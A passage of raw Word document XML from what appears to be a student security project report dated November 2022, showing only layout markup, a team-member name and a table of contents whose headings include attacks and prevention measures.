          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D07E93" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3194AEF6" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="73"/>
        <w:ind w:left="4012"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22C4FDAB" wp14:editId="7A44552C">
            <wp:extent cx="763384" cy="48133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
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="763384" cy="481330"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3008D9E0" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="236" w:lineRule="auto"/>
        <w:ind w:right="9260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9B3D4A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="22"/>
        <w:ind w:left="1804"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A8460D6" wp14:editId="3383C24B">
                <wp:extent cx="3566160" cy="324485"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="39702" name="Group 39702"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3566160" cy="324485"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="3566160" cy="324485"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="49194" name="Shape 49194"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3566160" cy="324485"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="3566160" h="324485">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3566160" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3566160" y="324485"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="32448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9702" style="width:280.8pt;height:25.55pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="35661,3244">
                <v:shape id="Shape 49195" style="position:absolute;width:35661;height:3244;left:0;top:0;" coordsize="3566160,324485" path="m0,0l3566160,0l3566160,324485l0,324485l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#5b9bd4"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="048B34B3" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="371"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B717152" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:right="102"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="5B9BD4"/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>TEAM MEMBERS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC90D49" w14:textId="2930E8B0" w:rsidR="00F97B52" w:rsidRDefault="00C02E4D" w:rsidP="00C02E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="77"/>
        <w:ind w:hanging="363"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="5B9BD4"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>LAKSHJEET PANDIT</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00C02E4D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0F7A85" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDC015A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722CCD02" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC1B48C" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11382B37" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DE93FB" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDFC41A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="227"/>
        <w:ind w:left="2095"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60C174D6" wp14:editId="78AC1B6B">
                <wp:extent cx="3197860" cy="38100"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="39703" name="Group 39703"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3197860" cy="38100"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="3197860" cy="38100"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="49196" name="Shape 49196"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3197860" cy="38100"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="3197860" h="38100">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3197860" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3197860" y="38100"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="38100"/>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9703" style="width:251.8pt;height:3pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="31978,381">
                <v:shape id="Shape 49197" style="position:absolute;width:31978;height:381;left:0;top:0;" coordsize="3197860,38100" path="m0,0l3197860,0l3197860,38100l0,38100l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#5b9bd4"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6672CA99" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:right="92"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="5B9BD4"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>NOVEMBER 07,2022</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD32F6A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCEDB90" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="38"/>
        <w:ind w:left="2095"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DA4C45D" wp14:editId="350E2496">
                <wp:extent cx="3197860" cy="38100"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="39704" name="Group 39704"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3197860" cy="38100"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="3197860" cy="38100"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="49198" name="Shape 49198"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3197860" cy="38100"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="3197860" h="38100">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3197860" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3197860" y="38100"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="38100"/>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9704" style="width:251.8pt;height:3pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="31978,381">
                <v:shape id="Shape 49199" style="position:absolute;width:31978;height:381;left:0;top:0;" coordsize="3197860,38100" path="m0,0l3197860,0l3197860,38100l0,38100l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#5b9bd4"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C9E5ED" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A867AEE" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7426E163" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="211"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">TABLE OF CONTENTS: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A18682" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:color w:val="365F91"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:id w:val="-664775936"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="59B1E04C" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9329"/>
            </w:tabs>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-2" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc48944">
            <w:r>
              <w:t>ABSTRACT</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc48944 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">3 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="17F6B0DC" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9329"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc48945">
            <w:r>
              <w:t>INTRODUCTION</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc48945 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">4 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6DEB94F4" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9329"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc48946">
            <w:r>
              <w:t>SYSTEM ARCHITECTURE</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc48946 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">5 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="01BE34DA" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9329"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc48947">
            <w:r>
              <w:t>MODULE DESCRIPTION</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc48947 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">11 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="78FE4B5C" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9329"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc48948">
            <w:r>
              <w:t>ATTACKS</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc48948 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">13 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4E9E0328" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9329"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc48949">
            <w:r>
              <w:t>IMPACTS OF THE ATTACK</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc48949 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">17 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1EEBF451" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9329"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc48950">
            <w:r>
              <w:t>RESULTS AND DISCUSSION</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc48950 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">18 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5D0898A6" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9329"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc48951">
            <w:r>
              <w:t>WORKING</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc48951 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">18 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2DD4EE40" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9329"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc48952">
            <w:r>
              <w:t>PREVENTION MEASURES</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc48952 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">45 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5CC4CDD6" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9329"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc48953">
            <w:r>
              <w:t>CONCLUSION</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc48953 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">49 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="05197A9D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9329"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc48954">
            <w:r>
              <w:t>REFERENCES</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc48954 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">49 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3D8193C8" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="2F0F22B8" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B3B61F" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735EB5D3" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13725585" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="163"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24477828" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="58"/>
        <w:ind w:left="101"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D949C8" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="32"/>
        <w:ind w:left="101"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
